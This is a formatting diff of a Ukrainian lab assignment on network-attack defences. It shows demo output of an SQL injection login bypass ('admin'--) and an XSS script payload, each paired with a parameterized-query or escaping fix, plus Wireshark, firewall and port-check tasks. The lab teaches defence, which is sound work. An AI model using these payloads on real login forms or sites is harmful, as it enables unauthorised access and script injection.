+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">--- Звичайний вхід ---</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">--- SQL-ін'єкція: admin'-- ---</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">АТАКА УСПІШНА! Увійшли без пароля.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">--- Той самий ввід через безпечний метод ---</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: None</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Ін'єкція заблокована!</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Безпечно! Скрипт відображається як текст.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="25"/>
     <w:bookmarkEnd w:id="26"/>
@@ -4553,48 +5150,97 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Встановити Wireshark (якщо не встановлено)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Запустити захоплення трафіку на основному інтерфейсі</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Відвідати кілька веб-сайтів (HTTP і HTTPS)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Знайти та проаналізувати HTTP-запити</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Застосувати фільтри для виділення трафіку</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Встановити Wireshark (якщо не встановлено)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Запустити захоплення трафіку на основному інтерфейсі</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Відвідати кілька веб-сайтів (HTTP і HTTPS)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Знайти та проаналізувати HTTP-запити</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Застосувати фільтри для виділення трафіку</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4615,48 +5261,97 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Переглянути поточні правила брандмауера</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Створити правило для блокування порту з варіанта</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Створити правило для дозволу порту з варіанта</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Перевірити роботу правил</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Видалити тестові правила</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Переглянути поточні правила брандмауера</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Створити правило для блокування порту з варіанта</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Створити правило для дозволу порту з варіанта</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Перевірити роботу правил</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Видалити тестові правила</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4677,30 +5372,79 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Визначити відкриті порти на localhost</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Ідентифікувати процеси, що прослуховують порти</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Записати результати</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Визначити відкриті порти на localhost</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Ідентифікувати процеси, що прослуховують порти</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Записати результати</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4721,39 +5465,88 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Запустити демонстраційний код SQL-ін'єкції</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Продемонструвати успішну атаку на вразливий код</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Продемонструвати блокування атаки безпечним кодом</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- Повторити для XSS</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Запустити демонстраційний код SQL-ін'єкції</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Продемонструвати успішну атаку на вразливий код</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Продемонструвати блокування атаки безпечним кодом</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Повторити для XSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7805,7 +8598,7 @@
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
-      <w:spacing w:after="120" w:before="120" w:line="200" w:lineRule="auto"/>
+      <w:spacing w:after="0" w:before="0" w:line="200" w:lineRule="auto"/>
       <w:ind w:hanging="340" w:left="340" w:right="0"/>
       <w:jc w:val="left"/>
     </w:pPr>
@@ -7814,6 +8607,26 @@
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
     </w:rPr>
+  </w:style>
+  <w:style w:customStyle="1" w:styleId="SourceCodeTable" w:type="table">
+    <w:name w:val="Source Code Table"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:qFormat/>
+    <w:tblPr>
+      <w:tblInd w:type="dxa" w:w="0"/>
+      <w:tblBorders>
+        <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+      </w:tblBorders>
+      <w:tblCellMar>
+        <w:top w:type="dxa" w:w="113"/>
+        <w:left w:type="dxa" w:w="113"/>
+        <w:bottom w:type="dxa" w:w="113"/>
+        <w:right w:type="dxa" w:w="113"/>
+      </w:tblCellMar>
+    </w:tblPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableCaption">
     <w:name w:val="TableCaption"/>

--- a/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
+++ b/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
@@ -110,6 +110,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
